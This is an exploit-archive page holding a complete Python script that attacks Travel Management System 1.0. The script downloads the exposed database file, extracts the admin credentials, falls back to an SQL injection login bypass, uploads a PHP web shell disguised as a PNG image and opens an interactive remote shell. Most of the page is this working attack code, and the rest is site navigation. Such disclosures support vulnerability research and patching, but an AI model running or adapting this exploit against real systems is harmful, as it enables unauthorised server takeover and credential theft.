exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Travel Management System 1.0 Remote Code Execution

Travel Management System 1.0 Remote Code Execution
Posted Aug 11, 2020
Authored by Bobby Cooke, hyd3sec

Travel Management System version 1.0 unauthenticated remote code execution exploit.

tags | exploit, remote, code execution
SHA-256 | ae792bbf40d2a842ca65d8accf25592c3e2dabed687c3b2b2ed5ea3351984110

Travel Management System 1.0 Remote Code Execution

Change Mirror Download
# Exploit Title: Travel Management System v1.0 - Unauthenticated Remote Code Execution
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# Vulnerability Discovery: Adeeb Shah (@hyd3sec)
# Date: August 10, 2020
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/travel.zip
# Version: 1.0
# CWE-732: Incorrect Permission Assignment for Critical Resource
# CWE-434: Unrestricted Upload of File with Dangerous Type
# Overall CVSS Score: 9.1
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:W/RC:R/CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:X/MC:X/MI:H/MA:H
# CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9
# CVSS Temporal Score: 9.1 | CVSS Environmental Score: 9.1 | Modified Impact Subscore: 6.1
# Tested On: Windows 10 (x64_86) + XAMPP | Python 2.7
# Vulnerability Description:
# Travel Management System v1.0 suffers from insufficient permissions allowing unauthenticated access to the database file containing credentials stored in clear text. This exploit automates all steps required to retrieve credentials and login with SQLi login bypass as a fail-safe and gain Remote Code Execution through an arbitrary file upload vulnerability.

import requests, re, sys, os
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' '
err = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' '
ok = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' '



def formatHelp(STRING):
return S[1]+F[2]+STRING+S[0]

def header():
head = S[3]+F[5]+' --- Travel Management System v1.0 - Unauthenticated Remote Code Execution (RCE) ---\n'+S[0]
return head

if __name__ == "__main__":

#1 | INIT
print(header())
#print(sig())
if len(sys.argv) != 3:
print(err+formatHelp("Usage:\t python %s <WEBAPP_URL> <Writable Path>" % sys.argv[0]))
print(err+formatHelp("Example:\t python %s http://192.168.222.135 $PWD" % sys.argv[0]))
sys.exit(-1)

global user
global password

#2 | FUNCTIONS

def webshell(SERVER_URL, WEBSHELL_PATH, session):
try:
WEB_SHELL = SERVER_URL + WEBSHELL_PATH
print(info+"Webshell URL: "+ WEB_SHELL)
getdir = {'s33k': 'echo %CD%'}
req = session.post(url=WEB_SHELL, data=getdir, verify=False)
status = req.status_code
if status != 200:
print(err+"Could not connect to the target system.")
req.raise_for_status()
print(ok+'Successfully connected to target system. All artifacts have been removed.')
cwd = re.findall('[CDEF].*', req.text)
cwd = cwd[0]+"> "
term = S[3]+F[5]+cwd+F[0]
print(F[0]+'____________________'+' Remote Code Execution '+F[0]+'____________________')
while True:
cmd = raw_input(term)
command = {'s33k': cmd}
req = requests.post(WEB_SHELL, data=command, verify=False)
status = req.status_code
if status != 200:
req.raise_for_status()
resp= req.text
print(resp)
except:
print('\r\n'+err+'Webshell session failed. Quitting.')
sys.exit(-1)




url = sys.argv[1] + '/travel/database/travel.sql'
r = requests.get(url)
server_url = sys.argv[1]
login_url = sys.argv[1] + '/travel/admin/loginform.php'
upload_url = sys.argv[1] + '/travel/admin/updatesubcategory.php'

#3 | EXPLOIT

print(info+'Attempting to exploit insecure permissions and download db file...')

with open(sys.argv[2] + '/travel.sql', 'wb') as f:
f.write(r.content)

if(r.status_code) != 200:
print(err+'Failed to save file locally...')
else:
print(ok+'File saved!')


with open(sys.argv[2] + "/travel.sql") as f:
found = False
for line in f:
if re.search('\'Admin\'', line):
print (ok+'Admin creds found while parsing db file!!!')
creds = str(line)
chars = "();'"
pattern = "[" + chars + "]"
credsnew = re.sub(pattern, "", creds)
#print credsnew
x = credsnew.split()
user = str(x[0])
user = user.replace(",", "")
password = str(x[1])
password = password.replace(",", "")
print(ok+'Admin Username: ' + user + ' Password: ' + password)
found = True


print(info+'Locating and cleaning up artifact...')
if os.path.exists(sys.argv[2] + "/travel.sql"):
os.remove("travel.sql")
else:
print(err+'Artifact not found! Make sure you manually find and remove it...')
print(info+'Attempting to connect...')

#4 | LOGIN
# Create a web session in python
s = requests.Session()
# GET request to webserver - Start a session & retrieve a session cookie
get_session = s.get(sys.argv[1], verify=False)
# Check connection to website & print session cookie to terminal OR die
if get_session.status_code == 200:
print(ok+'Successfully connected to target server & created session.')
else:
print(err+'Cannot connect to the server and create a web session.')
sys.exit(-1)
print(ok+'Username: ' + user)
print(ok+'Password: ' + password)
login_data = {'t1':user, 't2':password,'sbmt':'LOGIN'}
print(info+"Attempting to login with ripped credentials...")
#auth = s.post(url=LOGIN_URL, data=login_data, verify=False, proxies=proxies)
auth = s.post(url=login_url, data=login_data, verify=False)
loginchk = str(re.findall(r'Admin Links', auth.text))
# print(loginchk) # Debug - search login response for successful login
if loginchk == "[u'Admin Links']":
print(ok+"Login successful.")
else:
print(err+"Failed login. The database file may not reflect the current phpmyadmin configuration. Trying login bypass...")

#5 | SQLi Fail-Safe Login Bypass
sqli_data = {'t1':"' or '1'='1'#", 't2':'hyd3sec','sbmt':'LOGIN'}
print(info+"Attempting to execute SQLi bypass to login without credentials...")
#auth = s.post(url=login_url, data=sqli_data, verify=False, proxies=proxies)
auth = s.post(url=login_url, data=sqli_data, verify=False)
loginchk = str(re.findall(r'Admin Links', auth.text))
# print(loginchk) # Debug - search login response for successful login
if loginchk == "[u'Admin Links']":
print(ok+"SQLi Login bypass successful.")
else:
print(err+"SQLi failed.")
sys.exit(-1)


#6 | File Upload

# Content-Disposition: form-data; name="image"; filename="hyd3sec.php"
# Content-Type: image/png
shellz = {
't3':
(
'hyd3sec.php',
'<?php echo shell_exec($_REQUEST["s33k"]); ?>',
'image/png',
{'Content-Disposition': 'form-data'}
)
}
fdata = {'s1':'1','t1':'','t2':'Select','h1':'','t4':'','sbmt':'Update'}
print(info+"Exploiting image file upload vulnerability to upload and obfuscate shell")
#upload_house = s.post(url=UPLOAD_URL, files=shellz, data=fdata, verify=False, proxies=proxies)
upload_house = s.post(url=upload_url, files=shellz, data=fdata, verify=False)

#7 | Get Upload Name
get_session2 = s.get(server_url + '/travel/admin/subcatimages/hyd3sec.php', verify=False)
if get_session2.status_code == 200:
print(ok+'Successfully uploaded malicious file...')
else:
print(err+'Could not locate correct path!')
sys.exit(-1)

webshPath = '/travel/admin/subcatimages/hyd3sec.php'

#8 | RCE
webshell(server_url, webshPath, s)
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close